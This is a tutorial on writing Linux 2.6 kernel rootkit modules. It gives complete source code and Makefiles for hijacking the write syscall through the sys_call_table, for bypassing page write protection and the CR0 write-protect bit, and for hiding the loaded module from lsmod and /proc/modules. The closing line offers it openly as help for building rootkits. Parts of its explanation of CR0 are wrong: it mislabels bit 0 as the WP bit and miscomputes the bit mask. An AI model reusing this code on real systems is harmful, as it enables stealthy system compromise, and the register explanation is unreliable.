In this guide I will explain how to hijack the syscall in kernel 2.6.*: in particular how to bypass the kernel write protection and the “protected mode” bit of the CR0 CPUs register.

I don’t explain what is a syscall or syscall table: I assume you know what it is.



– Accessing to Syscall Table

If you have tried to execute rootkit wrote for 2.4.* kernels then you will know that them don’t work in the 2.6.* kernel systems.

In kernel 2.6.* the “sys_call_table” is no longer exported and you can’t access it directly: moreover the memory pages in which the table resides are now write-protected.

So we can no longer access the table in this way:

extern void *sys_call_table[]; ... sys_call_table[__NR_syscall] = pointer

But the table is still in the memory: if we know its memory address we can access it through a simple pointer. There are a lot of methods to find this address: the simplest is searching inside the “System.map” file in the “/boot” directory. This file is created each time a kernel is compiled: it contains all the symbols and their addresses used by the kernel.

The output of this file follows:

spaccio@spaccio-laptop:~$ cat /boot/System.map-2.6.35-23-generic ... c018d140 t cgroup_remount c018d260 T cgroup_path c018d310 t allocate_cg_links c018d410 t find_css_set c018d7d0 T cgroup_attach_task c018da40 T cgroup_clone c018dcc0 t cgroup_tasks_write c018dd90 t cgroup_release_agent c018df50 t proc_cgroup_show c018e180 t cgroup_pidlist_find c018e320 t cgroup_write_event_control c018e610 t pidlist_allocate c018e640 t pidlist_array_load ...

We are only interested at the “sys_call_table” address:

spaccio@spaccio-laptop:~$ cat /boot/System.map-2.6.35-23-generic | grep sys_call_table c05d2180 R sys_call_table

– Bypass Kernel Write Protection

Now we have the table’s address: but if you have looked at the “grep” command you will have seen that there is an ‘R’: this means that this address is “read-only”.

Indeed the kernel poses some structures in the “read-only” memory zone: in this way it protects them against intentional or unintentional changes which can lead to system instability. So we have to set this structure in “read/write” mode if we want to modify them.

Fortunately, the kernel provides us with special functions for this task:

void (*pages_rw)(struct page *page, int numpages) = (void *) 0xc012fbb0; void (*pages_ro)(struct page *page, int numpages) = (void *) 0xc012fe80;

The “pages_rw” function sets the write mode on the page passed as an argument; the second one sets the read mode on the page passed as an argument. Bu we need the virtual address of the page in order to use it: we can use for this task the “virt_to_page()” function, that converts the virtual address of the page in the corresponding physical page of memory accessible by the kernel. In order to use the “pages_*” functions we have to know their addresses. We can obtain them from the “System.map” file:

spaccio@spaccio-laptop:~$ cat /boot/System.map-2.6.35-23-generic | grep -e pages_rw -e pages_ro c012fbb0 T set_pages_rw c012fe80 T set_pages_ro

Now we can access and modify the sys_call_table in this way:

... unsigned long *syscall_table = (unsigned long *)0xc05d2180; ... void (*pages_rw)(struct page *page, int numpages) = (void *) 0xc012fbb0; void (*pages_ro)(struct page *page, int numpages) = (void *) 0xc012fe80; ... static int init(void) { struct page *_sys_call_page; printk(KERN_ALERT "

HIJACK INIT

"); _sys_call_page = virt_to_page(&syscall_table); pages_rw(_sys_call_page, 1); // now we can use the sys_call_table ... }

This is an example source code (hijack.c):

#include <linux/init.h> #include <linux/module.h> #include <linux/kernel.h> #include <linux/errno.h> #include <linux/types.h> #include <linux/unistd.h> #include <asm/cacheflush.h> #include <asm/page.h> #include <asm/current.h> #include <linux/sched.h> #include <linux/kallsyms.h> unsigned long *syscall_table = (unsigned long *)0xc05d2180; void (*pages_rw)(struct page *page, int numpages) = (void *) 0xc012fbb0; void (*pages_ro)(struct page *page, int numpages) = (void *) 0xc012fe80; asmlinkage int (*original_write)(unsigned int, const char __user *, size_t); asmlinkage int new_write(unsigned int fd, const char __user *buf, size_t count) { // hijacked write printk(KERN_ALERT "WRITE HIJACKED"); return (*original_write)(fd, buf, count); } static int init(void) { struct page *sys_call_page_temp; printk(KERN_ALERT "

HIJACK INIT

"); sys_call_page_temp = virt_to_page(&syscall_table); pages_rw(sys_call_page_temp, 1); original_write = (void *)syscall_table[__NR_write]; syscall_table[__NR_write] = new_write; return 0; } static void exit(void) { struct page *sys_call_page_temp; sys_call_page_temp = virt_to_page(syscall_table); syscall_table[__NR_write] = original_write; pages_ro(sys_call_page_temp, 1); printk(KERN_ALERT "MODULE EXIT

"); return; } module_init(init); module_exit(exit);

Here is a “Makefile” to compile the source code:

obj-m := hijack.o KDIR := /lib/modules/$(shell uname -r)/build PWD := $(shell pwd) default: $(MAKE) -C $(KDIR) SUBDIRS=$(PWD) modules

Now we can load our module:

spaccio@spaccio-laptop:~$ sudo insmod hijack.ko

– Bypass CR0 Protection

Some CPUs have the 0-bit of the CR (control register) set to 0: this means that “protected mode” is enabled. The “protected mode” was introduced in Intel CPUs starting from Intel 80286. This bit is also called wp-bit: we can check if our CPU support this kind of protection in this way:

spaccio@spaccio-laptop:~$ cat /proc/cpuinfo | grep wp wp : yes wp : yes

You can find here a brief description of the CR0 register. Reading from wikipedia you can see that bit 0 (WP) is the one that deals with the “protected mode”: if WP is set to 1 then the CPU is in “write-protect” mode; else it is in “read/write” mode.

If the CPU is in “write-protect” mode and if we try to load the “hijack.ko” module, the kernel will kill it:

spaccio@spaccio-laptop:~$ sudo insmod hijack.ko Killed

So if we set this bit to 0 we will have access to the memory pages (including the syscall table) in write mode.

Again the kernel provides us two functions:

#define read_cr0 () (native_read_cr0 ()) #define write_cr0 (x) (native_write_cr0 (x))

The native read/write functions are defined as follows:

static inline unsigned long native_read_cr0 (void) { unsigned long val; asm volatile("movl %%cr0,%0

\t" :"=r" (val)); return val; } static inline void native_write_cr0 (unsigned long val) { asm volatile("movl %0,%%cr0": :"r" (val)); }

The “read_cr0” function returns the value of the register CR0; the “write_cr0” function sets the bits of the register based on the value passed as parameter.

Now we can enable/disable the protected mode in such way:

/* disable protected mode I perform a not operation to 0x10000 ( so I have 0x01111). Later I perform an AND operation between the current value of the CR0 register and 0x01111. So the WP bit is set to 0 and the protected mode is disabled. */ write_cr0 (read_cr0 () & (~ 0x10000)); /* enable protected mode I perform an OR operation between the current value of the CR0 register and 0x10000. So the WP bit is set to 1 and the protected mode is enabled. */ write_cr0 (read_cr0 () | 0x10000);

Follows “hijack.c” modified (“hijack2.c”):

#include <linux/init.h> #include <linux/module.h> #include <linux/kernel.h> #include <linux/errno.h> #include <linux/types.h> #include <linux/unistd.h> #include <asm/cacheflush.h> #include <asm/page.h> #include <asm/current.h> #include <linux/sched.h> #include <linux/kallsyms.h> unsigned long *syscall_table = (unsigned long *)0xc05d2180; asmlinkage int (*original_write)(unsigned int, const char __user *, size_t); asmlinkage int new_write(unsigned int fd, const char __user *buf, size_t count) { // hijacked write printk(KERN_ALERT "WRITE HIJACKED"); return (*original_write)(fd, buf, count); } static int init(void) { printk(KERN_ALERT "

HIJACK INIT

"); write_cr0 (read_cr0 () & (~ 0x10000)); original_write = (void *)syscall_table[__NR_write]; syscall_table[__NR_write] = new_write; write_cr0 (read_cr0 () | 0x10000); return 0; } static void exit(void) { write_cr0 (read_cr0 () & (~ 0x10000)); syscall_table[__NR_write] = original_write; write_cr0 (read_cr0 () | 0x10000); printk(KERN_ALERT "MODULE EXIT

"); return; } module_init(init); module_exit(exit);

Makefile:

obj-m := hijack2.o KDIR := /lib/modules/$(shell uname -r)/build PWD := $(shell pwd) default: $(MAKE) -C $(KDIR) SUBDIRS=$(PWD) modules

Now we can load our module without problems:

spaccio@spaccio-laptop:~$ sudo insmod hijack2 spaccio@spaccio-laptop:~$

– Hide Kernel Module

We can simply hide our module: we can remove it from the module list (lsmod and /proc/modules). Look at the following source code (“hijack3.c”):

#include <linux/init.h> #include <linux/module.h> #include <linux/kernel.h> #include <linux/errno.h> #include <linux/types.h> #include <linux/unistd.h> #include <asm/cacheflush.h> #include <asm/page.h> #include <asm/current.h> #include <linux/sched.h> #include <linux/kallsyms.h> static int init(void) { list_del_init(&__this_module.list); return 0; } static void exit(void) { return; } module_init(init); module_exit(exit);

We compile and run it:

obj-m := hijack3.o KDIR := /lib/modules/$(shell uname -r)/build PWD := $(shell pwd) default: $(MAKE) -C $(KDIR) SUBDIRS=$(PWD) modules

If we try to look through lsmod we cannot find our module:

spaccio@spaccio-laptop:~$ sudo insmod hijack3 spaccio@spaccio-laptop:~$ lsmod Module Size Used by kernel_redir 2200 1 aes_i586 7280 2 aes_generic 26875 1 aes_i586 rfcomm 33811 6 binfmt_misc 6599 1 sco 7998 2 bnep 9542 2 l2cap 37008 16 rfcomm,bnep vboxnetadp 6454 0 vboxnetflt 15216 0 ... spaccio@spaccio-laptop:~$ lsmod |grep hijack3.ko spaccio@spaccio-laptop:~$

This happens thanks to “list_del_init()” function. This function is defined as follows:

static inline void list_del_init (struct list_head * entry) { __list_del (entry->prev, entry->next); INIT_LIST_HEAD (entry); }

While the “__list_del()” and “INIT_LIST_HEAD()” functions are defined as follows:

static inline void __list_del (struct list_head * prev, struct list_head * next) { next-> prev = prev; prev-> next = next; } static inline void INIT_LIST_HEAD (struct list_head * list) { list-> next = list; list-> prev = list; }

So the “list_del_init()” function removes the name of our module from the doubly linked list that manages the list of modules: in this way can not be found by lsmod (or in /proc/modules).

– Conclusion

The post is finished and I hope that it can help you to write your own modules (or rootkit :) ).

Bye.